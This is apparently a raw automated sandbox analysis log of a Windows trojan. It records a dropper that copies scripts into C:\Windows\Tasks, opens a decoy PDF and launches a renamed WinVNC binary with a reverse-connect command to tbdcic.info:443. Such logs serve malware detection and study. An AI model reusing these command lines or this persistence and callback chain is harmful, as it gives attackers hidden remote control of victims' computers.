                            Source: Xv6Ya.d8LhT.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: Xv6Ya.d8LhT.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: Xv6Ya.d8LhT.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: browser_sn.exe.8.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: browser_sn.exe.8.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: T8xrZb7nBL.exe, 00000000.00000000.1416965730.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1419617664.0000000002471000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exeBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: conhost.exe.8.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                            Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@69/63@3/1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6C2B934B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B918A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,23_2_00007FF6C2B918A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6C2B93550
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,27_2_00007FF6C2B934B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B918A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,27_2_00007FF6C2B918A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,27_2_00007FF6C2B93550
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6C2B92D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,27_2_00007FF6C2B92D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF6C2BE9BC0
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                            Source: T8xrZb7nBL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
                            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: browser_sn.exeString found in binary or memory: -install
                            Source: browser_sn.exeString found in binary or memory: -startservice
                            Source: browser_sn.exeString found in binary or memory: -stopservice
                            Source: browser_sn.exeString found in binary or memory: -install
                            Source: browser_sn.exeString found in binary or memory: -startservice
                            Source: browser_sn.exeString found in binary or memory: -stopservice
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile read: C:\Users\user\Desktop\T8xrZb7nBL.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\T8xrZb7nBL.exe "C:\Users\user\Desktop\T8xrZb7nBL.exe"
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winsta.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wldp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
